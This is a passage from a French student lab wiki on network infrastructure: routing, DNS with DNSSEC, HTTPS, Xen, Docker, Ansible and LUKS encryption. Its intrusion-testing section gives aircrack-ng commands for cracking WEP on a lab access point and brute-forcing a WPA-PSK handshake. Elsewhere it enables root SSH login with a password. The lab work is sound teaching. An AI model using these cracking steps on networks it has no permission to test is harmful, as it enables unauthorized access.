  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 root@mycoplasma:~# cat /etc/hosts&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/ansible/hosts       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 root@mycoplasma:~# ansible all -m ping -o&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
